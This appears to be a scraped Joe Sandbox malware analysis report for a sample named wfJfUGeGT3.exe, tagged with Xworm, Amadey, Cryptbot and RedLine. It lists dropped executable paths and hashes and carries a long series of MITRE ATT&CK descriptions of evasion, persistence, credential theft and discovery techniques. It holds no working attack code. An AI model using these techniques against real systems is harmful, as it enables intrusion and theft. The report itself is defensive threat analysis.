CreateFileW.KERNELBASE(00000000,00000000,?,00CC9FB8,?,?,00000000,?,00CC9FB8,00000000,0000000C), ref: 00CC9BE5

Memory Dump Source

Source File: 00000018.00000002.3268681729.0000000000C91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000018.00000002.3268377783.0000000000C90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3269602279.0000000000CCD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3271083971.0000000000CDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.3273118186.0000000000CE1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_c90000_kitty.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 00d5d9336dedef3a709c8e5fb3a9ae37ae935225986bb744b123cfc31355dc3d
Instruction ID: 9a127b0a94c0e985476e5aebda7ac1872852060d9cbfd06fd83327b414134cf8
Opcode Fuzzy Hash: 00d5d9336dedef3a709c8e5fb3a9ae37ae935225986bb744b123cfc31355dc3d
Instruction Fuzzy Hash: EDD06C3201014DBBDF028F84DC06EDA3BAAFB48714F014010FE1856020C732E862EB94

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report wfJfUGeGT3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Amadey

Threatname: Cryptbot

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe

C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe

C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe

Windows Analysis Report
wfJfUGeGT3.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre